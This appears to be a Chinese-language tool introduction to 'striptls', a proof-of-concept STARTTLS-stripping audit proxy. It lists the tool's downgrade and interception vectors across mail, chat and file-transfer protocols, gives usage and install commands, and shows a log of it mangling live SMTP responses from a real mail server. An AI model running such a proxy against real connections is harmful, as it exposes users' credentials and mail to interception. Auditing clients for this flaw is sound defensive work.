striptls审计代理

STARTTLS 是对纯文本通信协议的扩展。它提供一种方式将纯文本连接升级为加密连接（TLS或SSL），而不是另外使用一个端口作加密通信。

striptls是一款端口剥离攻击的POC实现

SMTP

SMTP.StripFromCapabilities - server response capability patchSMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response codeSMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)SMTP.StripWithTemporaryErrorSMTP.StripWithErrorSMTP.ProtocolDowngradeStripExtendedModeSMTP.InjectCommand

POP3

POP3.StripFromCapabilitiesPOP3.StripWithErrorPOP3.UntrustedIntercept

IMAP

IMAP.StripFromCapabilitiesIMAP.StripWithErrorIMAP.UntrustedInterceptIMAP.ProtocolDowngradeToV2

FTP

FTP.StripFromCapabilitiesFTP.StripWithErrorFTP.UntrustedIntercept

NNTP

NNTP.StripFromCapabilitiesNNTP.StripWithErrorNNTP.UntrustedIntercept

XMPP

XMPP.StripFromCapabilities
XMPP.StripInboundTLS
XMPP.UntrustedIntercept
ACAP (untested)
ACAP.StripFromCapabilities
ACAP.StripWithError
ACAP.UntrustedIntercept

IRC

IRC.StripFromCapabilitiesIRC.StripWithErrorIRC.UntrustedInterceptIRC.StripWithNotRegisteredIRC.StripCAPWithNotregisteredIRC.StripWithSilentDrop

结果：

- [*] client: 127.0.0.1-     [Vulnerable!] -     [Vulnerable!] -     [           ] -     [Vulnerable!] - [*] client: 192.168.139.1-     [Vulnerable!] -     [Vulnerable!] -     [Vulnerable!] 

实例:

#> python -m striptls --help    # from pip/setup.py#> python striptls --help       # from source / root folderUsage: striptls [options]       example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25Options:
      -h, --help            show this help message and exit  -v, --verbose         make lots of noise [default]
      -l LISTEN, --listen=LISTENlisten ip:port [default: 0.0.0.0:]
      -r REMOTE, --remote=REMOTE
                            remote target ip:port to forward sessions to
      -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEMformat assumed [default: server.pem]
      -x VECTORS, --vectors=VECTORS                            Comma separated list of vectors. Use 'ALL' (default)                            to select all vectors. Available vectors:
                            FTP.StripFromCapabilities, FTP.StripWithError,
                            FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
                            IMAP.StripWithError, IMAP.UntrustedIntercept,
                            NNTP.StripFromCapabilities, NNTP.StripWithError,
                            NNTP.UntrustedIntercept, POP3.StripFromCapabilities,
                            POP3.StripWithError, POP3.UntrustedIntercept,
                            SMTP.ProtocolDowngradeStripExtendedMode,
                            SMTP.StripFromCapabilities, SMTP.StripWithError,
                            SMTP.StripWithInvalidResponseCode,
                            SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                            XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                            XMPP.UntrustedIntercept [default: ALL]

安装：

1.从pip安装

#> pip install striptls

2.从源安装

#> setup.py install

示例:

                  inbound                    outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
  smtp-client                   striptls                    remote/target

本地 smtp-client -> localhost:8825 (代理) -> mail.gmx.net:25

审计模式:

在特定的情况下遍历所有协议并且跟踪违反starttls协议的客户端。你可以选择按Ctrl + C来中止审核并打印结果。

#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO     -  ready.
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:21   , proto:     FTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:143  , proto:    IMAP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:119  , proto:    NNTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:110  , proto:    POP3): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,275 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:25   , proto:    SMTP): 
2016-02-02 22:11:56,276 - DEBUG    - * added test (port:5222 , proto:    XMPP): 
2016-02-02 22:11:56,276 - INFO     - ]), 110: set([, ]), 143: set([, , ]), 21: set([, , ]), 119: set([, , ]), 25: set([, , , , ])}>
2016-02-02 22:12:08,477 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO     -  client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG    - 
2016-02-02 22:12:09,759 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING  -  terminated.
2016-02-02 22:12:13,056 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO     -  client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG    - 
2016-02-02 22:12:14,197 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG    -  [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING  -  terminated.
2016-02-02 22:12:16,649 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO     -  client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG    - 
2016-02-02 22:12:17,760 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG    -  [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING  -  terminated.
2016-02-02 22:12:20,071 - DEBUG    -  - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO     -  client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO     -  connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG    -  [client] <= [server]          '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG    - 
2016-02-02 22:12:21,181 - DEBUG    -  [client] => [server]          'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG    -  [client] <= [server]          '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG    -  [client] => [server]          'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG    -  [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG    -  [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG    -  [client] => [server]          'mail FROM: size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG    -  [client] <= [server]          '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG    -  [client] => [server]          'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG    -  [client] <= [server]          '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING  -  terminated.
2016-02-02 22:12:23,665 - WARNING  - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO     -  -- audit results --
2016-02-02 22:12:23,666 - INFO     - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 
2016-02-02 22:12:23,666 - INFO     -     [           ] 
2016-02-02 22:12:23,666 - INFO     -     [Vulnerable!] 

除了审计模式外还有从服务端剥离starttls、无效化starttls响应、不可行的ssl链接（对于客户端则是不在检验服务端的证书是否可信）以及XMPP的追踪审计的功能。

介绍内容来自 FreeBuf黑客与极客（FreeBuf.COM）